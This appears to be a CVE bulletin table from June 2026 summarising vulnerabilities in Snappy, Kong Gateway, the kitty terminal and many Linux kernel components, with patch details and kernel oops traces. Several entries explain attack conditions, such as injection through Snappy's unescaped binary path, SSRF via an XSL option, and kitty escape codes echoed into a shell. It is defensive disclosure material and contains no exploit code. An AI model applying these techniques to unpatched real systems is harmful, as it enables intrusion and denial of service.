| KnpLabs--snappy | Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a URL or an HTML page. Prior to version 1.7.1, on POSIX, escapeshellarg('/usr/bin/wkhtmltopdf') returns the literal string '/usr/bin/wkhtmltopdf' with the single-quote characters included. is_executable() then looks for a file whose actual name contains those quote characters, which essentially never exists. The safe branch is dead code and $command always falls through to the raw, unescaped value. The rest of the arguments (options, input, output) are escaped correctly, so injection has to land in the binary string itself. That happens whenever the binary path is sourced from configuration that is user-influenced, derived from environment variables that ultimately come from request data, or concatenated with any user-controlled fragment. This issue has been patched in version 1.7.1. | 2026-06-10 | not yet calculated | CVE-2026-46643 |
| KnpLabs--snappy | Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a URL or an HTML page. Prior to version 1.7.0, there is an SSRF and local file read vulnerability via the xsl-style-sheet option. This issue has been patched in version 1.7.0. | 2026-06-10 | not yet calculated | CVE-2026-46683 |
| Kong--Kong Enterprise Gateway | An HTTP request smuggling and desynchronization vulnerability affects Kong Gateway Enterprise 3.4, 3.10, 3.11, 3.12, 3.13, and 3.14 series. The vulnerability is caused by a parsing flaw in Kong's HTTP request processing pipeline when handling untrusted HTTP/1.1 traffic. | 2026-06-11 | not yet calculated | CVE-2026-6338 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU-based terminal. In versions prior to 0.47.0, it is possible to inject commands into the subshell through a kitty error. A special escape code will make kitty return an error; this error is not escaped and will be echoed back to the terminal with CRLF, so it will be run by the shell in use. To exploit this bug, the victim must use netcat or a similar program to connect to the attacker, or else be listening for someone to connect. Once this condition is set, an attacker could pwn the victim's computer using a special kitty escape code that will run a command in the shell in use. Version 0.47.0 fixes the issue. | 2026-06-12 | not yet calculated | CVE-2026-42850 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU-based terminal. In versions prior to 0.47.3, kitty's OSC 21 (color-control) query reply reflects attacker-controlled bytes, including newlines, into the shell's input without sanitization. Version 0.47.3 fixes the issue. | 2026-06-12 | not yet calculated | CVE-2026-54057 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vkms: Convert to DRM's vblank timer Replace vkms' vblank timer with the DRM implementation. The DRM code is identical in concept, but differs in implementation. Vblank timers are covered in vblank helpers and initializer macros, so remove the corresponding hrtimer in struct vkms_output. The vblank timer calls vkms' custom timeout code via handle_vblank_timeout in struct drm_crtc_helper_funcs. | 2026-06-08 | not yet calculated | CVE-2025-71315 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix zero-size GDS range init on RDNA4 RDNA4 (GFX 12) hardware removes the GDS, GWS, and OA on-chip memory resources. The gfx_v12_0 initialisation code correctly leaves adev->gds.gds_size, adev->gds.gws_size, and adev->gds.oa_size at zero to reflect this. amdgpu_ttm_init() unconditionally calls amdgpu_ttm_init_on_chip() for each of these resources regardless of size. When the size is zero, amdgpu_ttm_init_on_chip() forwards the call to ttm_range_man_init(), which calls drm_mm_init(mm, 0, 0). drm_mm_init() immediately fires DRM_MM_BUG_ON(start + size <= start) -- trivially true when size is zero -- crashing the kernel during modprobe of amdgpu on an RX 9070 XT. Guard against this by returning 0 early from amdgpu_ttm_init_on_chip() when size_in_page is zero. This skips TTM resource manager registration for hardware resources that are absent, without affecting any other GPU type. DRM_MM_BUG_ON() only asserts if CONFIG_DRM_DEBUG_MM is enabled in the kernel config. This is apparently rarely enabled as these chips have been in the market for over a year and this issue was only reported now. Oops-Analysis: http://oops.fenrus.org/reports/bugzilla.korg/221376/report.html (cherry picked from commit 5719ce5865279cad4fd5f01011fe037168503f2d) | 2026-06-08 | not yet calculated | CVE-2026-46276 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/imagination: Fix segfault when updating ftrace mask Fix invalid data access by passing right data for debugfs entry. | 2026-06-08 | not yet calculated | CVE-2026-46278 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/alloc_tag: clear codetag for pages allocated before page_ext initialization Due to initialization ordering, page_ext is allocated and initialized relatively late during boot. Some pages have already been allocated and freed before page_ext becomes available, leaving their codetag uninitialized. A clear example is in init_section_page_ext(): alloc_page_ext() calls kmemleak_alloc(). If the slab cache has no free objects, it falls back to the buddy allocator to allocate memory. However, at this point page_ext is not yet fully initialized, so these newly allocated pages have no codetag set. These pages may later be reclaimed by KASAN, which causes the warning to trigger when they are freed because their codetag ref is still empty. Use a global array to track pages allocated before page_ext is fully initialized. The array size is fixed at 8192 entries, and will emit a warning if this limit is exceeded. When page_ext initialization completes, set their codetag to empty to avoid warnings when they are freed later. This warning is only observed with CONFIG_MEM_ALLOC_PROFILING_DEBUG=Y and mem_profiling_compressed disabled. | 2026-06-08 | not yet calculated | CVE-2026-46279 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vmalloc: fix buffer overflow in vrealloc_node_align() Commit 4c5d3365882d ("mm/vmalloc: allow to set node and align in vrealloc") added the ability to force a new allocation if the current pointer is on the wrong NUMA node, or if an alignment constraint is not met, even if the user is shrinking the allocation. On this path (need_realloc), the code allocates a new object of 'size' bytes and then memcpy()s 'old_size' bytes into it. If the request is to shrink the object (size < old_size), this results in an out-of-bounds write on the new buffer. Fix this by bounding the copy length by the new allocation size. | 2026-06-08 | not yet calculated | CVE-2026-46281 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: frequency: admv1013: fix NULL pointer dereference on str When device_property_read_string() fails, str is left uninitialized but the code falls through to strcmp(str, ...), dereferencing a garbage pointer. Replace manual read/strcmp with device_property_match_property_string() and consolidate the SE mode enums into a single sequential enum, mapping to hardware register values via a switch consistent with other bitfields in the driver. Several cleanup patches have been applied to this driver recently so this will need a manual backport. | 2026-06-08 | not yet calculated | CVE-2026-46282 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: Use kfree_sensitive() to free auth session in tpm_dev_release() tpm_dev_release() uses plain kfree() to free chip->auth, which contains sensitive cryptographic material including HMAC session keys, nonces, and passphrase data (struct tpm2_auth). Every other code path that frees this structure uses kfree_sensitive() to zero the memory before releasing it: both tpm2_end_auth_session() and tpm_buf_check_hmac_response() do so. The tpm_dev_release() path is the only one that does not, leaving key material in freed slab memory until it is eventually overwritten. Use kfree_sensitive() for consistency with the rest of the driver and to ensure session keys are scrubbed during device teardown. | 2026-06-08 | not yet calculated | CVE-2026-46283 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/hugetlb: fix early boot crash on parameters without '=' separator If hugepages, hugepagesz, or default_hugepagesz are specified on the kernel command line without the '=' separator, early parameter parsing passes NULL to hugetlb_add_param(), which dereferences it in strlen() and can crash the system during early boot. Reject NULL values in hugetlb_add_param() and return -EINVAL instead. | 2026-06-08 | not yet calculated | CVE-2026-46284 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: docg3: fix use-after-free in docg3_release() In docg3_release(), the docg3 pointer is obtained from cascade->floors[0]->priv before the loop that calls doc_release_device() on each floor. doc_release_device() frees the docg3 struct via kfree(docg3) at line 1881. After the loop, docg3->cascade->bch dereferences the already-freed pointer. Fix this by accessing cascade->bch directly, which is equivalent since docg3->cascade points back to the same cascade struct, and is already available as a local variable. This also removes the now-unused docg3 local variable. | 2026-06-08 | not yet calculated | CVE-2026-46285 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: leds: qcom-lpg: Check for array overflow when selecting the high resolution When selecting the high resolution values from the array, FIELD_GET() is used to pull from a 3 bit register, yet the array being indexed has only 5 values in it. Odds are the hardware is sane, but just to be safe, properly check before just overflowing and reading random data and then setting up chip values based on that. | 2026-06-08 | not yet calculated | CVE-2026-46286 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: txgbe: fix RTNL assertion warning when remove module For the copper NIC with external PHY, the driver called phylink_connect_phy() during probe and phylink_disconnect_phy() during remove. It caused an RTNL assertion warning in phylink_disconnect_phy() upon module remove. To fix this, add rtnl_lock() and rtnl_unlock() around the phylink_disconnect_phy() in remove function. ------------[ cut here ]------------ RTNL: assertion failed at drivers/net/phy/phylink.c (2351) WARNING: drivers/net/phy/phylink.c:2351 at phylink_disconnect_phy+0xd8/0xf0 [phylink], CPU#0: rmmod/4464 Modules linked in: ... CPU: 0 UID: 0 PID: 4464 Comm: rmmod Kdump: loaded Not tainted 7.0.0-rc4+ Hardware name: Micro-Star International Co., Ltd. MS-7E16/X670E GAMING PLUS WIFI (MS-7E16), BIOS 1.90 12/31/2024 RIP: 0010:phylink_disconnect_phy+0xe4/0xf0 [phylink] Code: 5b 41 5c 41 5d 41 5e 41 5f 5d 31 c0 31 d2 31 f6 31 ff e9 3a 38 8f e7 48 8d 3d 48 87 e2 ff ba 2f 09 00 00 48 c7 c6 c1 22 24 c0 <67> 48 0f b9 3a e9 34 ff ff ff 66 90 90 90 90 90 90 90 90 90 90 90 RSP: 0018:ffffce7288363ac0 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff89654b2a1a00 RCX: 0000000000000000 RDX: 000000000000092f RSI: ffffffffc02422c1 RDI: ffffffffc0239020 RBP: ffffce7288363ae8 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000000 R12: ffff8964c4022000 R13: ffff89654fce3028 R14: ffff89654ebb4000 R15: ffffffffc0226348 FS: 0000795e80d93780(0000) GS:ffff896c52857000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00005b528b592000 CR3: 0000000170d0f000 CR4: 0000000000f50ef0 PKRU: 55555554 Call Trace: <TASK> txgbe_remove_phy+0xbb/0xd0 [txgbe] txgbe_remove+0x4c/0xb0 [txgbe] pci_device_remove+0x41/0xb0 device_remove+0x43/0x80 device_release_driver_internal+0x206/0x270 driver_detach+0x4a/0xa0 bus_remove_driver+0x83/0x120 driver_unregister+0x2f/0x60 pci_unregister_driver+0x40/0x90 txgbe_driver_exit+0x10/0x850 [txgbe] __do_sys_delete_module.isra.0+0x1c3/0x2f0 __x64_sys_delete_module+0x12/0x20 x64_sys_call+0x20c3/0x2390 do_syscall_64+0x11c/0x1500 ? srso_alias_return_thunk+0x5/0xfbef5 ? do_syscall_64+0x15a/0x1500 ? srso_alias_return_thunk+0x5/0xfbef5 ? do_fault+0x312/0x580 ? srso_alias_return_thunk+0x5/0xfbef5 ? __handle_mm_fault+0x9d5/0x1040 ? srso_alias_return_thunk+0x5/0xfbef5 ? count_memcg_events+0x101/0x1d0 ? srso_alias_return_thunk+0x5/0xfbef5 ? handle_mm_fault+0x1e8/0x2f0 ? srso_alias_return_thunk+0x5/0xfbef5 ? do_user_addr_fault+0x2f8/0x820 ? srso_alias_return_thunk+0x5/0xfbef5 ? irqentry_exit+0xb2/0x600 ? srso_alias_return_thunk+0x5/0xfbef5 ? exc_page_fault+0x92/0x1c0 entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2026-06-08 | not yet calculated | CVE-2026-46287 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/efi: Fix graceful fault handling after FPU softirq changes Since commit d02198550423 ("x86/fpu: Improve crypto performance by making kernel-mode FPU reliably usable in softirqs"), kernel_fpu_begin() calls fpregs_lock() which uses local_bh_disable() instead of the previous preempt_disable(). This sets SOFTIRQ_OFFSET in preempt_count during the entire EFI runtime service call, causing in_interrupt() to return true in normal task context. The graceful page fault handler efi_crash_gracefully_on_page_fault() uses in_interrupt() to bail out for faults in real interrupt context. With SOFTIRQ_OFFSET now set, the handler always bails out, leaving EFI firmware page faults unhandled. This escalates to die() which also sees in_interrupt() as true and calls panic("Fatal exception in interrupt"), resulting in a hard system freeze. On systems with buggy firmware that triggers page faults during EFI runtime calls (e.g., accessing unmapped memory in GetTime()), this causes an unrecoverable hang instead of the expected graceful EFI_ABORTED recovery. Fix by replacing in_interrupt() with !in_task(). This preserves the original intent of bailing for interrupts or NMI faults, while no longer falsely triggering from the FPU code path's local_bh_disable(). [ardb: Sashiko spotted that using 'in_hardirq() || in_nmi()' leaves a window where a softirq may be taken before fpregs_lock() is called, but after efi_rts_work.efi_rts_id has been assigned, and any page faults occurring in that window will then be misidentified as having been caused by the firmware. Instead, use !in_task(), which incorporates in_serving_softirq(). ] | 2026-06-08 | not yet calculated | CVE-2026-46290 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: caam - guard HMAC key hex dumps in hash_digest_key Use print_hex_dump_devel() for dumping sensitive HMAC key bytes in hash_digest_key() to avoid leaking secrets at runtime when CONFIG_DYNAMIC_DEBUG is enabled. | 2026-06-08 | not yet calculated | CVE-2026-46291 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pmdomain: core: Fix detach procedure for virtual devices in genpd If a device is attached to a PM domain through genpd_dev_pm_attach_by_id(), genpd calls pm_runtime_enable() for the corresponding virtual device that it registers. While this avoids boilerplate code in drivers, there is no corresponding call to pm_runtime_disable() in genpd_dev_pm_detach(). This means these virtual devices are typically detached from its genpd, while runtime PM remains enabled for them, which is not how things are designed to work. In worst cases it may lead to critical errors, like a NULL pointer dereference bug in genpd_runtime_suspend(), which was recently reported. For another case, we may end up keeping an unnecessary vote for a performance state for the device. To fix these problems, let's add this missing call to pm_runtime_disable() in genpd_dev_pm_detach(). | 2026-06-08 | not yet calculated | CVE-2026-46292 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: microchip: mpfs-ccc: fix out of bounds access during output registration UBSAN reported an out of bounds access during registration of the last two outputs. This out of bounds access occurs because space is only allocated in the hws array for two PLLs and the four output dividers that each has, but the defined IDs contain two DLLS and their two outputs each, which are not supported by the driver. The ID order is PLLs -> DLLs -> PLL outputs -> DLL outputs. Decrement the PLL output IDs by two while adding them to the array to avoid the problem. | 2026-06-08 | not yet calculated | CVE-2026-46293 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: fix a buffer overflow in ioctl processing Tony Asleson (using Claude) found a buffer overflow in dm-ioctl in the function retrieve_status: 1. The code in retrieve_status checks that the output string fits into the output buffer and writes the output string there 2. Then, the code aligns the "outptr" variable to the next 8-byte boundary: outptr = align_ptr(outptr); 3. The alignment doesn't check overflow, so outptr could point past the buffer end 4. The "for" loop is iterated again, it executes: remaining = len - (outptr - outbuf); 5. If "outptr" points past "outbuf + len", the arithmetic wraps around and the variable "remaining" contains an unusually high number 6. With "remaining" being high, the code writes more data past the end of the buffer Luckily, this bug has no security implications because: 1. Only root can issue device mapper ioctls 2. The commonly used libraries that communicate with device mapper (libdevmapper and devicemapper-rs) use a buffer size that is aligned to 8 bytes - thus, "outptr = align_ptr(outptr)" can't overshoot the input buffer and the bug can't happen accidentally | 2026-06-08 | not yet calculated | CVE-2026-46294 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: x86: Do IRR scan in __kvm_apic_update_irr even if PIR is empty Fall back to apic_find_highest_vector() when PID.ON is set but PIR turns out to be empty, to correctly report the highest pending interrupt from the existing IRR. In a nested VM stress test, the following WARNING fires in vmx_check_nested_events() when kvm_cpu_has_interrupt() reports a pending interrupt but the subsequent kvm_apic_has_interrupt() (which invokes vmx_sync_pir_to_irr() again) returns -1: WARNING: CPU: 99 PID: 57767 at arch/x86/kvm/vmx/nested.c:4449 vmx_check_nested_events+0x6bf/0x6e0 [kvm_intel] Call Trace: kvm_check_and_inject_events vcpu_enter_guest.constprop.0 vcpu_run kvm_arch_vcpu_ioctl_run kvm_vcpu_ioctl __x64_sys_ioctl do_syscall_64 entry_SYSCALL_64_after_hwframe The root cause is a race between vmx_sync_pir_to_irr() on the target vCPU and __vmx_deliver_posted_interrupt() on a sender vCPU. The sender performs two individually-atomic operations that are not a single transaction: 1. pi_test_and_set_pir(vector) -- sets the PIR bit 2. pi_test_and_set_on() -- sets PID.ON The following interleaving triggers the bug: Sender vCPU (IPI): Target vCPU (1st sync_pir_to_irr): B1: set PIR[vector] A1: pi_clear_on() A2: pi_harvest_pir() -> sees B1 bit A3: xchg() -> consumes bit, PIR=0 (1st sync returns correct max_irr) B2: set PID.ON = 1 Target vCPU (2nd sync_pir_to_irr): C1: pi_test_on() -> TRUE (from B2) C2: pi_clear_on() -> ON=0 C3: pi_harvest_pir() -> PIR empty C4: *max_irr = -1, early return IRR NOT SCANNED The interrupt is not lost (it resides in the IRR from the first sync and is recovered on the next vcpu_enter_guest() iteration), but the incorrect max_irr causes a spurious WARNING and a wasted L2 VM-Enter/VM-Exit cycle. | 2026-06-08 | not yet calculated | CVE-2026-46295 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: s3c64xx: fix NULL-deref on driver unbind A change moving DMA channel allocation from probe() back to s3c64xx_spi_prepare_transfer() failed to remove the corresponding deallocation from remove(). Drop the bogus DMA channel release from remove() to avoid triggering a NULL-pointer dereference on driver unbind. This issue was flagged by Sashiko when reviewing a controller deregistration fix. | 2026-06-08 | not yet calculated | CVE-2026-46296 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: libwx: use request_irq for VF misc interrupt Currently, request_threaded_irq() is used with a primary handler but a NULL threaded handler, while also setting the IRQF_ONESHOT flag. This specific combination triggers a WARNING since the commit aef30c8d569c ("genirq: Warn about using IRQF_ONESHOT without a threaded handler"). WARNING: kernel/irq/manage.c:1502 at __setup_irq+0x4fa/0x760 Fix the issue by switching to request_irq(), which is the appropriate interface for a non-threaded interrupt handler, and removing the unnecessary IRQF_ONESHOT flag. | 2026-06-08 | not yet calculated | CVE-2026-46297 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pseries/papr-hvpipe: Fix race with interrupt handler While executing ->ioctl handler or ->release handler, if an interrupt fires on the same cpu, then we can enter into a deadlock. This patch fixes both these handlers to take spin_lock_irq{save|restore} versions of the lock to prevent this deadlock. | 2026-06-08 | not yet calculated | CVE-2026-46298 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: topcliff-pch: fix use-after-free on unbind Give the driver a chance to flush its queue before releasing the DMA buffers on driver unbind | 2026-06-08 | not yet calculated | CVE-2026-46301 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: selinux: allow multiple opens of /sys/fs/selinux/policy Currently there can only be a single open of /sys/fs/selinux/policy at any time. This allows any process to block any other process from reading the kernel policy. The original motivation seems to have been a mix of preventing an inconsistent view of the policy size and preventing userspace from allocating kernel memory without bound, but this is arguably equally bad. Eliminate the policy_opened flag and shrink the critical section that the policy mutex is held. While we are making changes here, drop a couple of extraneous BUG_ONs. | 2026-06-08 | not yet calculated | CVE-2026-46302 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: os_dep: avoid NULL pointer dereference in rtw_cbuf_alloc The return value of kzalloc_flex() is used without ensuring that the allocation succeeded, and the pointer is dereferenced unconditionally. Guard the access to the allocated structure to avoid a potential NULL pointer dereference if the allocation fails. | 2026-06-08 | not yet calculated | CVE-2026-46305 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pmdomain: mediatek: fix use-after-free in scpsys_get_bus_protection_legacy() In scpsys_get_bus_protection_legacy(), of_find_node_with_property() returns a device node with its reference count incremented. The function then calls of_node_put(node) before checking whether syscon_regmap_lookup_by_phandle() returns an error. If an error occurs, dev_err_probe() dereferences the node pointer to print diagnostic information, but the node memory may have already been freed due to the earlier of_node_put(), leading to a use-after-free vulnerability. Fix this by moving the of_node_put() call after the error check, ensuring the node is still valid when accessed in the error path. | 2026-06-08 | not yet calculated | CVE-2026-46308 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/uapi: Reject coh_none PAT index for CPU cached memory in madvise Add validation in xe_vm_madvise_ioctl() to reject PAT indices with XE_COH_NONE coherency mode when applied to CPU cached memory. Using coh_none with CPU cached buffers is a security issue. When the kernel clears pages before reallocation, the clear operation stays in CPU cache (dirty). GPU with coh_none can bypass CPU caches and read stale sensitive data directly from DRAM, potentially leaking data from previously freed pages of other processes. This aligns with the existing validation in vm_bind path (xe_vm_bind_ioctl_validate_bo). v2(Matthew brost) - Add fixes - Move one debug print to better place v3(Matthew Auld) - Should be drm/xe/uapi - More Cc v4(Shuicheng Lin) - Fix kmem leak issues by the way v5 - Remove kmem leak because it has been merged by another patch v6 - Remove the fix which is not related to current fix v7 - No change v8 - Rebase v9 - Limit the restrictions to iGPU v10 - No change (cherry picked from commit 016ccdb674b8c899940b3944952c96a6a490d10a) | 2026-06-08 | not yet calculated | CVE-2026-46309 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: renesas: vsp1: Fix NULL pointer deref on module unload When unloading the module on gen 4, we hit a NULL pointer dereference. This is caused by the cleanup code calling vsp1_drm_cleanup() where it should be calling vsp1_vspx_cleanup(). Fix this by checking the IP version and calling the drm or vspx function accordingly, the same way as the init code does. | 2026-06-08 | not yet calculated | CVE-2026-46310 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: videobuf2: Set vma_flags in vb2_dma_sg_mmap vb2_dma_contig sets VMA flags VM_DONTEXPAND and VM_DONTDUMP and I do not see a reason why vb2_dma_sg should behave differently. This avoids hitting `WARN_ON(!(vma->vm_flags & VM_DONTEXPAND));` in drm_gem_mmap_obj() during mmap() of an imported dma-buf from the out of tree Apple ISP camera capture driver which uses vb2_dma_sg_memops. gst-launch-1.0 v4l2src ! gtk4paintablesink [ 38.201528] ------------[ cut here ]------------ [ 38.202135] WARNING: CPU: 7 PID: 2362 at drivers/gpu/drm/drm_gem.c:1144 drm_gem_mmap_obj+0x1f8/0x210 [ 38.203278] Modules linked in: rfcomm snd_seq_dummy snd_hrtimer snd_seq snd_seq_device uinput nf_conntrack_netbios_ns nf_conntrack_broadcast nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nf_tables qrtr bnep nls_ascii i2c_dev loop fuse dm_multipath nfnetlink brcmfmac_wcc hid_magicmouse hci_bcm4377 brcmfmac brcmutil bluetooth ecdh_generic cfg80211 ecc btrfs xor xor_neon rfkill hid_apple raid6_pq joydev aop_als apple_nvmem_spmi industrialio snd_soc_aop apple_z2 snd_soc_cs42l84 tps6598x snd_soc_tas2764 macsmc_reboot spi_nor macsmc_hwmon rtc_macsmc gpio_macsmc macsmc_power regmap_spmi macsmc_input dockchannel_hid panel_summit appledrm nvme_apple dwc3 snd_soc_macaudio drm_client_lib nvme_core phy_apple_atc hwmon apple_sart apple_dockchannel macsmc apple_rtkit_helper spmi_apple_controller aop apple_wdt mfd_core nvmem_apple_efuses pinctrl_apple_gpio apple_isp apple_dcp videobuf2_dma_sg mux_core spi_apple [ 38.203300] videobuf2_memops i2c_pasemi_platform snd_soc_apple_mca videobuf2_v4l2 videodev clk_apple_nco videobuf2_common snd_pcm_dmaengine adpdrm asahi apple_admac adpdrm_mipi drm_dma_helper pwm_apple i2c_pasemi_core drm_display_helper mc cec apple_dart ofpart apple_soc_cpufreq leds_pwm phram [ 38.217677] CPU: 7 UID: 1000 PID: 2362 Comm: gst-launch-1.0 Tainted: G W 6.17.6+ #asahi-dev PREEMPT(full) [ 38.219040] Tainted: [W]=WARN [ 38.219398] Hardware name: Apple MacBook Pro (13-inch, M2, 2022) (DT) [ 38.220213] pstate: 21400005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 38.221088] pc : drm_gem_mmap_obj+0x1f8/0x210 [ 38.221643] lr : drm_gem_mmap_obj+0x78/0x210 [ 38.222178] sp : ffffc0008dc678e0 [ 38.222579] x29: ffffc0008dc678e0 x28: 0000000000042a97 x27: ffff8000b701b480 [ 38.223465] x26: 00000000000000fb x25: ffffc0008dc67d20 x24: ffffc0008dc67968 [ 38.224402] x23: ffff8000e3ca5600 x22: ffff8000265b7800 x21: ffff80003000c0c0 [ 38.225279] x20: 0000000000000000 x19: ffff8000b68c5200 x18: ffffc0008dc67968 [ 38.226151] x17: 0000000000000000 x16: 0000000000000000 x15: ffffc000810a30a8 [ 38.227042] x14: 00007fff637effff x13: 00005555de91ffff x12: 00007fff63293fff [ 38.227942] x11: 0000000000000000 x10: ffff8000184ecf08 x9 : ffffc0007a1900c8 [ 38.228824] x8 : ffffc0008dc67968 x7 : 0000000000000012 x6 : ffffc0015cf1c000 [ 38.229703] x5 : ffffc0008dc676a0 x4 : ffffc00081a27dc0 x3 : 0000000000000038 [ 38.230607] x2 : 0000000000000003 x1 : 0000000000000003 x0 : 00000000100000fb [ 38.231488] Call trace: [ 38.231806] drm_gem_mmap_obj+0x1f8/0x210 (P) [ 38.232342] drm_gem_mmap+0x140/0x260 [ 38.232813] __mmap_region+0x488/0x9a0 [ 38.233277] mmap_region+0xd0/0x148 [ 38.233703] do_mmap+0x350/0x5c0 [ 38.234148] vm_mmap_pgoff+0x14c/0x200 [ 38.234612] ksys_mmap_pgoff+0x150/0x208 [ 38.235107] __arm64_sys_mmap+0x34/0x50 [ 38.235611] invoke_syscall+0x50/0x120 [ 38.236075] el0_svc_common.constprop.0+0x48/0xf0 [ 38.236680] do_el0_svc+0x24/0x38 [ 38.237113] el0_svc+0x38/0x168 [ 38.237507] el0t_64_sync_handler+0xa0/0xe8 [ 38.238034] el0t_64_sync+0x198/0x1a0 [ 38.238491] ---[ end trace 0000000000000000 ]--- There were discussions in [1] at the end of 2023 that mmap() on imported ---truncated--- | 2026-06-08 | not yet calculated | CVE-2026-46312 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: intel/ipu6: fix error pointer dereference In an error path isp->psys is confirmed to be an error pointer, not NULL, so this condition is true and the error pointer is dereferenced. So isp->psys should be set to NULL before going to out_ipu6_bus_del_devices. Detected by Smatch: drivers/media/pci/intel/ipu6/ipu6.c:690 ipu6_pci_probe() error: 'isp->psys' dereferencing possible ERR_PTR() [Sakari Ailus: Fix commit message.] | 2026-06-08 | not yet calculated | CVE-2026-46313 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Reject empty multisync extension to prevent infinite loop v3d_get_extensions() walks a userspace-provided singly-linked list of ioctl extensions without any bound on the chain length. A local user can craft a self-referential extension (ext->next == &ext) with zero in_sync_count and out_sync_count, which bypasses the existing duplicate- extension guard: if (se->in_sync_count || se->out_sync_count) return -EINVAL; The guard never fires because v3d_get_multisync_post_deps() returns immediately when count is zero, leaving both fields at zero on every iteration. The result is an infinite loop in kernel context, blocking the calling thread and pegging a CPU core indefinitely. Fix this by rejecting a multisync extension where both in_sync_count and out_sync_count are zero in v3d_get_multisync_submit_deps(). An empty multisync carries no synchronization information and serves no useful purpose, so returning -EINVAL for such an extension is the correct defense against this attack vector. | 2026-06-08 | not yet calculated | CVE-2026-46314 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/waitid: clear waitid info before copying it to userspace IORING_OP_WAITID stores its result fields in struct io_waitid::info and later copies them to userspace siginfo. The prep path initializes the request arguments, but it does not initialize info itself. If the wait operation completes without reporting a child event, the common wait code can return without writing wo_info. In that case io_waitid_finish() still copies iw->info to userspace, exposing stale bytes from the reused io_kiocb command storage. Clear the result storage during prep so the io_uring path matches the regular waitid syscall, which uses a zero-initialized struct waitid_info. | 2026-06-09 | not yet calculated | CVE-2026-46315 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "mm/hugetlbfs: update hugetlbfs to use mmap_prepare" This reverts commit ea52cb24cd3f ("mm/hugetlbfs: update hugetlbfs to use mmap_prepare") with conflict resolution to account for changes in commit ea52cb24cd3f ("mm/hugetlbfs: update hugetlbfs to use mmap_prepare"). The patch incorrectly handled hugetlb VMA lock allocation at the mmap_prepare stage, where a failed allocation occurring after mmap_prepare is called might result in the lock leaking. There is no risk of a merge causing a similar issue, as VMA_DONTEXPAND_BIT is set for hugetlb mappings. As a first step in addressing this issue, simply revert the change so we can rework how we do this having corrected the underlying issues. We maintain the VMA flags changes as best we can, accounting for the fact that we were working with a VMA descriptor previously and propagating like-for-like changes for this. Note that we invoke vma_set_flags() and do not call vma_start_write() as vm_flags_set() does. This is OK as it's being done in an .mmap hook where the VMA is not yet linked into the tree so nobody else can be accessing it. | 2026-06-09 | not yet calculated | CVE-2026-46318 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erofs: handle end of filesystem properly for file-backed mounts I/O requests beyond the end of the filesystem should be zeroed out, similar to loopback devices and that is what we expect. | 2026-06-09 | not yet calculated | CVE-2026-46329 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/nouveau: fix nvkm_device leak on aperture removal failure When aperture_remove_conflicting_pci_devices() fails during probe, the error path returns directly without unwinding the nvkm_device that was just allocated by nvkm_device_pci_new(). This leaks both the device wrapper and the pci_enable_device() reference taken inside it. Jump to the existing fail_nvkm label so nvkm_device_del() runs and balances both. The leak was introduced when the intermediate nvkm_device_del() between detection and aperture removal was dropped in favor of creating the pci device once. | 2026-06-09 | not yet calculated | CVE-2026-52904 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: disallow non-power of two min_region_sz on damon_start() Commit d8f867fa0825 ("mm/damon: add damon_ctx->min_sz_region") introduced a bug that allows unaligned DAMON region address ranges. Commit c80f46ac228b ("mm/damon/core: disallow non-power of two min_region_sz") fixed it, but only for damon_commit_ctx() use case. Still, DAMON sysfs interface can emit non-power of two min_region_sz via damon_start(). Fix the path by adding the is_power_of_2() check on damon_start(). The issue was discovered by sashiko [1]. | 2026-06-09 | not yet calculated | CVE-2026-52905 |
